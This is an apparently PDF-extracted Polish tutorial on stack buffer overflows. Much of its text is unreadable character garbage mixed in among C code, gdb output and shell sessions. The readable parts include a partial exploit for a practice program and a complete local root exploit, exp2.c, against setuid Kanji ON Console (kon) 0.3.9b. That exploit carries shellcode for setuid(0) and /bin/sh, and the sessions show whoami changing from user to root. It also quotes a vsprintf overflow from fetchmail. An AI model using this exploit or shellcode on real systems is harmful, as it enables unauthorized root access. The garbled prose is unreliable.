while((opt = getopt(argc,argv,"p:o:?")) != -1) {

switch(opt) {

case 'o':

offset=atoi(opta

êIë7ìQíî:îgï5ðEðIñQò
ómô5ïõ2ö
÷2øYô2êEù!ò
ùUúûøó;ü5ïýe÷ þ[ü5ö

break;

case 'p':

path=optarg; // path do vuln1 programu

break;

case '?':

ÿ
  

 Yÿ "!#$ %

break;

default:

ussage(argv[0])



&'"Yÿ !#(%

break;

}

}

/* Sprawdzamy czy program istnieje */

if ( (fp=fopen(path,"r"))==NULL) {

printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);

ussage(argv[0]);

}

/* alokujemy miejsce na nasz bufor podany jako argument */

if (!(buf=(char*)malloc(BUFS))) {

printf("\nI can\'t locate memory! - buf\n");

exit(-1);

}

/* alokujemy miejsce na nasz bufor pomocniczy */

if (!(sh=(char*)malloc(SHELL))) {

printf("\nI can\'t locate memory! - shell\n");

exit(-1);

}

printf("\n\t...::: -=[ exploit na program vuln1 ]=- :::...\n");

printf("\n\t[+] Bulding buffors!\n");

)+*",-.)+*,0/21354+678*99;:<=3*>@?81,A7=BCEDD
?=)F"G=H89&I;J<LKGM13)+* 6N?5<O$)+<L,KG

ret_addr=(long*)ret+offset; // dodajemy offset - dodajemy a nie odejmujemy

D&D2H8<POEK816QF G=RS?)FG?513LTUV4

W'1"TXI=OEO(I;YTZ6QF <8[Q: I;B

D&D\6Q,A<56N)+<5[QK8I

*]O^3=_L`

printf("\t[+] Using adres 0x%x\n",ret_addr);

/* przygotowanie do zapisu adresu powrotnego */

buf_addr=buf;

buf_addr2=buf_addr;

/* zapisujemy do buforu podanego jako argument adres powrotny */

while(buf_addr2-buf <= BUFS-5) {

(*(unsigned long*)buf_addr2)=ret_addr;

ab8cd
effLg+hikjkl2m nn
op(q&r sZtuoe"vMwMx yzlza8e|{}&w(}Ae"a8~q;x€a5yP}&wZ~&oe{vVb'{‚{'fƒ5y

nnktu„yLpzy(xo w8~qpEƒ8etQo"wvS…g|o"w…5efLsbM†ˆ‡Š‰

}

n‹Œy8t}e}ƒZq=oƒ8e sMf=yzabZcygbŽ{ tQ}
…5y}Ago"aƒwVe awpzq&fLo q’‘fLo q&ŒyLƒ“t

q;r”s5y•5x ow–‹ n

buf_addr2[BUFS-4]='\0';

n‹]o e"…ZqtQb'{"vMwMxe"„&w(ab8c|yLg‚…8yLv—yxƒ8q;x"o wVq˜ƒ
t}gbs8x|{'e v“q5…5yv—y=x ƒZq;x owv—q™š”›œ‹ n

for(i=0;i<(SHELL);i++)

sh[i]=NOP;

n‹Œya8~&qx oevMw…5y=x o } sVefg+ tubzpEa=b8c|yLgo…5yv—y=x ƒZq;x"o"wvž‘fLo qv“eaw5

zapisywany shellcode */

buf_addr = sh + ((SHELL)-strlen(shellcode)-1);

n+‹”o e …8qAtb'{'"vw—tQŸ5~&~;x yf=ƒ5e fL…ZqtQb'{

 ˆ¡M¢]£k¤

¥–¦ §

for(i=0;i<strlen(shellcode);i++)

*(buf_addr++) = shellcode[i];

§¦Œ¨8©ª«ª¬Z­=®¬8« ¯z°^±²Z³¨L´|®µ]¶8¨L·—¨  ¬Z­& "® ¥·–¸±¥(±¥=¹¨$°­;«º=¨L·—¨»º® ­&µP©¼­;½”¯5¨¾5 

zy */

sh[SHELL] = '\0';

printf("\nExecuting the vuln program - %s\n\n",path);

/* uruchamiamy nasz program, a jako argument podajemy nasz bufor */

execl(path,path,buf,0);

return 0;

}

Skompilujemy teraz nasz epxloit i zobaczymy czy

®« ºL® ­;«¹«¿8ÀzÁµz¬5«|¼¶Z­;µ ´°Ãº=« ·X¥Ä©²Z­&º=«º=Á&«(¬8« ©u®µ»¨

°$´+« ÅÁ­Æ°(µ»¨z¶´¨=»´+«"·M²kÇ

# chmod +x victim1

$ cc exp1.c -o exp1

$ whoami

user

$ ./exp1

...

# whoami

root

#

ÈÊÉAËzÌ8Í ÎÃÏ Ð5Ë=ÑLÒLӘÔË\Õ|ÕÕ֌×|Ø5ÏÐ5ËLΓÓ&ÙÓÚÎMۏÜ5ËLݒԍËLÞ5ß]à5ÍLáÐ5ÍãâÍ"Þ5Ëz×ËËɈÕÕÕ

3. Real

ä

Ü×åLàØ'â'æ"ΏÛçɍæ"×+Í ÒXÒËLà8ÍÏÒ Û5èˆâ'Í

ÞéáÓ;ߏΓÍVáuÜ×+Í Ýz͏ҏÜ=×+Í"Ý$ÑLÒLÓÆÝPÛÎêËLÜ×Ëë×+Í"ΓËÝ$ÍÌ8Ó&æ ÎÄì=í’ÉAÍ"Þ5ËLÝzÍ"ÌÛÎ

Ü=×+Ëë×Í Î“æ ÎSà5ßÑÒÓ;æ]Þ5ËLÌ.ì

ä

ÉÍ Ì8ÑÍ ×ÑËÝ(ËNâæáÉ2ËÌ(Ó0ÌZáQÉAÍ Ù&ËÝ(Í ÌÛ$ÝÊÝ(Ó&æÙ0؏ÑÛZáQÉ×Ûà=Ø5Ï|â'ÍÏ ÐzҁÜ5Í"×+Í Î“æÉ×+æ"ÎîáuØ8Ó&Ñ
ì

ï

ÌZðË×ÎVÍ Ïâ'ß

Ë

ÑLÒLӘØ×Ò æ

Ý

Þ5ËÌ8Ó&æ

Ü5ËÒ"ÛZáQÞ5ÍÙ&ÓÚÎMÛ

Ü=×Òæë=Ù;ñÑÍâñÏ

Ù&ÓáQÉAß

òó5ôõö÷ø

(

http://securityfocus.com/advisories/5434

ùúãû\üýuþÿ
8ü&ÿ



ü

ö+÷

 &ü 

ó





ÿ
 ÿ

ö

þ ÿ5ÿ8ü 

ó=öó

!

÷

—ü

÷



"

ö



ôLö+÷



þ#





$

-

%'&()*,+-$.)0/&(214365"78(9:1;*,):<=3>(#?:@+)A1BC+D@2EF<*2GCHJIK&MLN7OP<PQC*-) <R3STOU7V

GW< SRGX1Y7VZ(&STOP9:)QCE[U\(2&]L^*-) &ST_2@-`F)ab*,143dc1BC( OD):<=3

&2( /,&DL[) <Y(#*,)Fc2@,e4& BfO"(21R3g<hSd):ijE):<"kl(#?:@+#&,QTknmDoo-H

p

/2BRq#c2@g36<EUNL[) iY7rOP(2<c2@,+#&DL 1Y7r_& *,1ts=9)uSCGX)*+wv xyH

Listing 5. Debugowanie kon’a.

root@localhost:~# gdb kon

GNU gdb 5.0

Copyright 2000 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-slackware-linux"...(no debugging symbols

found)...

(gdb) r -Coding `perl -e 'print "A"x800'`

Starting program: /usr/bin/kon -Coding `perl -e 'print "A"x800'`

Kanji ON Console ver.0.3.9 (2000/04/09)

KON> video type VGA' selected

KON> hardware scroll mode.

Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb) info reg eip

eip 0x41414141 0x41414141

(gdb) quit

Voila!

z{1EwUFc<YO/&,QCBR<"( *-) 5|_&#*#GuBC&9:i^*,1Y(~}0€t‚,z{& a"<YE[UF/B=OU-SCGƒ5/,) k|OY*qDLZ(2&/,)WST1*,):1N<„/-9 &)G@KH2€…U2E

BR1OP<E†@2aYUg3g<E[U{3<

STO"7OP<b)**<43‡EF<Gƒ&(DUˆL^U2_&#B=OU-SCGƒ1*,) 1‰c?Wi"( @hG:U/2@]ŠŒ‹[Htz{<GW&(21Gƒ1ŽLU2_,& B=OU-SCG@g3<

LwSC_,1*-)_,),OE.) <**#U7YV~QCBC&2(2& LN)WSC_& LU,7VKH ‘^&DGW& LU[LtU+29u5

’“…”g“•–—˜™Kšœ›=ž:ŸW R¡=Ÿ¢£[¤#¥yš

Listing 6. exp2.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <getopt.h>

#define PATH "/usr/bin/kon"

#define BUFS 800

/* ...::: -=[ www.pi3.int.pl ]=- :::... */

char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68\x3a"

"\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20\x5d"

"\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69\x68"

"\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68\x3a\x3a"

"\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04\xcd"

"\x80"

/* setuid(0) */

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"

/* setgid(0) */

"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"

/* exec /bin/sh */

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"

"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"

"\x80"

/* exit(0) */

"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

long ret_ad(char *a1, char *a2) {

return (0xbffffffa-strlen(a1)-strlen(a2));

}

int ussage(char *arg) {

printf("\n\t...::: -=[ exploit for Kon version 0.3.9b-16 (by pi3) ]=- :::...\n");

printf("\n\tUssage:\n\t[+] %s [options]\n

-? <this help screen>

-o <offset>

-p PATH\n\n",arg);

exit(-1);

}

int main(int argc, char *argv[]) {

long ret,*buf_addr;

char *buf,*path=PATH;

static char *sh[]={shellcode,NULL};

int i,opt,offset=0;

FILE *fp;

while((opt = getopt(argc,argv,"p:o:?")) != -1) {

switch(opt) {

case 'o':

offset=atoi(optarg);

break;

case 'p':

path=optarg;

break;

case '?':

default:

ussage(argv[0]);

break;

}

}

if ( (fp=fopen(path,"r"))==NULL) {

printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);

ussage(argv[0]);

} fclose(fp);

if (!(buf=(char*)malloc(BUFS))) {

printf("\nI can\'t locate memory! - buf\n");

exit(-1);

}

printf("\n\t...::: -=[ exploit for Kon version 0.3.9b-16 (by pi3) ]=- :::...\n");

printf("\n\t[+] Bulding buffors!\n");

ret=ret_ad(shellcode,path);

ret+=offset;

printf("\t[+] Using adres 0x%x\n",ret);

buf_addr=(long*)buf;

for(i=0;i<BUFS;i+=4) {

*(buf_addr) = ret; buf_addr++;

}

printf("\nExecuting the vuln program - %s\n\n",path);

execle(path,path,"-Coding", buf, 0, sh);

return 0;

}

¦§¨,©‡ª«,¬=©#­C®0¨2¯W° ­X±‰ª²"³ ´Pµu¶·,©2³§¸2±
¹g§Y¨©§­CºD«2»¶¸2¯N³¼ §8½­R§Y¾P¼:µ¿½|¶Pº#©{·2­R©ºD­R§Y»w«-®tÀR¯X§­R§4¹;Àdµ:²8ª#±{ª2±2Á^©#¸

½[µ ¶"¼u© ¨­R©D¯u¸,©ÂyÃ"µ Ä8ōƽ µ:¶"¼¿¨©ÂyÇÀÈÁW©D½N§ÉwµA³©2³§=¹.³©¸,µ:¶"º#©F¹6¶Y³2¶Y¸Êª§4¹y¯X®Ë¨2¯W° ­X±‡ª,²Y³#´Dµ ¶Ì´P§·,µWÀT§Y¸#±Ê´Y¸,§¨-µ ¶»

NULL ('\

ÍÎ

ÉyÏPÐK­=´"¶¯X¶PÀC¯«g¹d»[±[½ µ ²"̸,§PÀT´"¶Yº#© ¨©#¸§2Ñ

$ whoami

user

$ ls –alh /usr/bin/kon

-rwsr-xr-x 1 root root 45k Jul 5 20:57 /usr/bin/kon*

$ cc exp2.c -o exp2

$ ./exp2

...

KON> video type VGA' selected

KON> hardware scroll mode.

...::: -=[

www.pi3.int.pl

]=- :::…

# whoami

root

#

ÒNÓÔ:Õ:ÖØ× ÙÚÖYÛ#ÜPÔ:ÖÝÖÝWÓ]ÞFÖÞßáàCÓ2ÓDâ=ãCäåDÕ:Õ Öæ×=×=×çgÖèné[Ô Û2ÖPêbÞ~åâƒÓ2ÛÖlÖâWÖè,ÓDé Öë-Ô:ÖíìàRÓ2î àRÖÞ~ï]Ülì2à=Üßè2ÝÖPÛ ïZÖ

ìàRÖé Û ÜPÔ¿é|åPî#Óì2àCÓ2îDàRÖÞ~ï
ãCï,ÔuÛ2Ó é|åPî#Óë,Ô ðYÜß2ÞãyÔ ñNë,Ô å|àCò óë-ÔÈ×-ô…à=ÜPåõ,֏âuß,Õè,ÓÜYë,Ö"Õ åöPêNÓ2Û#ìÓ é Ô åPÛ ë-Ô ÷|ÓøRÔ:ÖàCñ"ù

è2âWò àRÖ Þ~Ö ï-ãCâWÖé Ô:Ó#ë#ß>ÖâWàXß2õï2ëÖâÚãÈï-Ô Û2Öúôûà=ÜPåõÖýügåYÛ#ëÖYèFï-þ4é[Ô ÖPÛ2Ó#ÞFÔ ê|éNÖÞFùÿÔóNë,Ô:å^é

ãTÜß-ãÈâuè,Ô:å Û ÜPÔ¿ï2àXß>ÛÖ=üg÷

ÛÓãÈâWñìwõ#ß õåÜYì,ÓþRàÈåYÛ ë-Ô ÓNÜYÞFÔuåë,Ô:ê
ôËù2Ó#àRÖÜtë,Ô åŒé ãTÜß-ãÈâuè,ÔuårÛ Ü Ôï2àXßãT÷ŒÞFÓ ó Õ:Ôé åtÛÓ^éßèÓ à4Üß-ãÈâWÖë-Ô:Ö

(exploitowania).



Ó~Û2ÓwâWå4üAÞ~åâƒÓ2Û ß,ùè2âƒò àC÷tïóß,ÕuÔuþCÞwß~éhâ:ß2Þ

ìà=Üß2èÝÖ"Û#ÜPÔ åDùâƒÓwàRò#óë,Ô

ãdÔ:ñ|Ó ë,֏âuàRÓãTÜè,ñNÓ2Û[ìÓ ìà=Ü"åPÛ ë-Ô å=üù,î#ÛDßó

ë-Ô åïóß#é Ö"Õ:ÔWþRÞßÌé|ðPÖ"Õ åÔ ë-ãRâWà=ï2è,ð=ü

Ô ‡Ô

âàCÖ"ø4ÔuÕuÔuþÈÞ[ß
é

ìÓ#ì2àRÖé^ë2ß;Ö"Û àRåDãtÜ"Öwì,Ô:åàXéwãCÜßÞ

àRÖÜDåÞÌúæôÓ^ü6åDãCâ

é|ÝÖPþÈë,Ô å>ÜDÖ"Õ åâW÷Ìî#ÛDßMï2ÞÔ å þÈð"Ô Þ[ߎãCä,åPÕuÕ ð"ÓÛ2åé

ÜYÞÔ:åë2ë2ßðYäÊþCàCÓ2Û2Ó é ÔãÈè,ÓDétß-ðäÿúóßÝåÞ

àRò éë-Ô:åó;Ôë2ë,å"î2Ó

ãTäåPÕ:Õ:ð"Ó2Û ï-ùÚÖ"ÕuåàRÓ#õ,Ô

Ó ëâXÓãdÖÞÓ8ðPÓ;ì,Ó ìà=ÜPå"Û ë,Ô:åÜFâuß2Þ

ÜPÖDãCâà=Ü"åóPåë,Ô åYÞFùÚÔ ó>Û2ÓÛ2ÖÝWåÞ

éãTäåPÕ:Õ:ð"Ó2Û ÜDÔ:åFõ2ß

é^ß-þ4é[Ô åâƒÕ Ö

݅Ó#ëÕuÔë2è.ÛÓ[ÞFÓyüå=ütãÈâuàRÓ#ë#ß Èú¿ú ú

-=[

www.pi3.int.pl

]=-

:ú úúCù-Ó àRÖYÜ^ëÖ[ãTÖYÞ\èÓ#ë,ÔuåYð|Û2ÓÛ2ÖYÝåÞ

ÔëØãCâà=ï2è,ð4ü6ñFå-Ô¿âƒù

è2âƒò#àRÖ.ãyÔuñwéß2è,Ó ë,ÖFî#ÛDß2õ2ß8ðYÓþrõ2ß2ÝÓ>ë,Ôuå âƒÖèÌÜ>ãCäåDÕ:Õ ðPÓ2ÛåÞ

np

ú,âWàRÖ"øRÔ:ÕuÔ¿õ#ß-þÈÞ[ß
é

þRàRÓÛ2åYè

ë-Ô å"î2ÓûÔé^ß2èÓ#ë#ß#éNÖÝWÓ õ#ßãyÔ ñrë

ie to co powinno –

âƒÖè,Ô årÞ~ÖYÝåŒÜPÖõåYÜì-Ô å"ðÜ"åYë,Ô å2ú

=DNR F]HQLH

 "!$#%'&()#*,+.- / 0%21
-+32%&%5467896;:<$#>=?! '@AA8:BA!9#>C/(:4D"+B:<%E1/F$/,&(G"+;H&(IJ/(4D%21/D-+;/,1)+7A=CK#91&(8

2/L E@AA8=8M2%5NO"$EP -$Q:R0C!$#%C=SS0/1,#@""! %21,/T/,1+;A!9#@A)%A!$#K- /&,@AE)6 $/(-$#/)4UA!$#V@A)%1/$P &/WL,9X3/(+Y$Z

oznac

2[:</ Z\#>]^:R_XR!, @YNO[=S/(]2%^L,8 `M4F+;"])0#a4Ucb

np

d

1&)8e/,1)+;!$#@AE%"!$#%[- QA:B0#fNg%)67:U0#@"L ["! " H(44

h"i;j)k,lSm"n o2pm_hqn$pm^rUpm2s*t u vxwqy,k9z3u(iYk{x|

P

u(} hA~Ji3l€en hq‚((p>k,i;ƒ[r„r'k(…†zR~J} ‚‡‚,m2h"lVu(n9pmcˆ<} m"‰n$m^hE‚(Š pJ‹xuiB€

lVu(Œ2n h52n h2sm"2w\} u‚Uh2‚i;mE‹xm"l

http://www.securityfocus.com/archive/1/338436

):

int SockPrintf(FILE *sockfp, char *format,...)

{

va_list ap;

char buf[32768];

va_start(ap, format);

vsprintf(buf, format, ap);

va_end(ap);

return SockWrite(buf, 1, strlen(buf), sockfp);

}

Ž

Ep>ki;hArDhzBk,n,t$o3Oh’‘ uoAt,“”i7p>n,~ Om)‹7~‚ sh~Bmju •p>ŒekŒ"€rDh–zRk,nt o;OpŠ$‹—},i7p*n~Bz˜t,~R™(i7h‡n$pm‹š},i;h"rF‚Eh›oEpœ2j(k

h"i;j)k,lSm"n~<™(r},iYEmAoužOmE‹š~†lVu(ŒEsJparDm
},i3)mA} m"‰n9pmAn9pm5yk$z3ui;h|ŸCpm(‹;~RmA~€Ch"t,k,i7h~ r~€,l¡},i3€,} h2‚(t,kU~<h\‚()p>k,išh

n9pmfOm)‹7~†lKuŒ)sp>rDh'‚,ur€,t ui3A€9‹š~<hn$ph,|E“urpƒEom35p>n$zYu(i3lVhEo3Op u,‚ ‹š€,‰Jh"l¢‚u

} m"‰n$mjuUhE‚(Š$p‹xuiB€”|

Ž

k,Œ2uct u(lVmAi7oA€g£n m2jucu(}i;u,j)i7hAlSu)rDh"n9phWt ui3A€9‹š~<hWW~<mEoA¤,n$usuj,pp

Open Source. Niektóre bugi jednak

lVu,jœVy€ wCy$hAi;‚Eu},i;u$‹7~Rur'€,tiB€~<mV} u(}i32m"VAr'€t,‰JmC}i3EmA~<mE‹š~<u)rUhAn9pmCKy h"i;‚()uM‚(‰k$j,p>l} hAi7hAlSm~i7m"l¥‚u

t$hAŒE‚m3‚,u ‹7~Rƒ"},n mY¦u} o3p },i7u,j)i;hlCk”|(§ ‚(€kg£i3"€,l€"n$hAn$m
n h"l¨‘$m

gmentation fault zdebugujcie program

i napiszcie exploita ;).

©

n$zYu(i3lVho;gm

u

n$h3£n u)r‹—A€ oA¤

u,‚t,iB€,~€ o¤

y,k$jho¤

‹xœ

‚u ‹š~<ƒA}n m

n h

spvxo2pm

y,k j)~i7h2ª

(

http://securityfocus.com/archive/1

«x¬C­F®A¯2°(±³² ®µ´R¶¸·¹Jº7´R¶µ»S¼(¯E½¡º£¹¶’¾

®A¿9¹Jºx®2À,¬CÁ¼)´<¼(ÂD½Ã½"Ä¿9·¼¹>´±ÅºxÆ

Ç;È

²9¹½A¯D²$® ´R½3É ·¹ʗËE¹½'¾2®»V¹½(º7¾)ËA¾2®² ½EÌ ®E·½'´<¼K¼ÂD¹½2·½

Ç

¾E®°(¾(¹½3ÉE¬2Í®3É"ÊY¹½"¯(ºš¾2½F½"Ä¿9·¼¹a´J±C»V¼(¯2² ®'¾²$®2·½Î2À²$®

stronie packetstorm (

http://www.packetstormsecurity.nl

).

5. Bibliografia

http://phrack.org/show.php?p=49&a=14

http://www.pi3.int.pl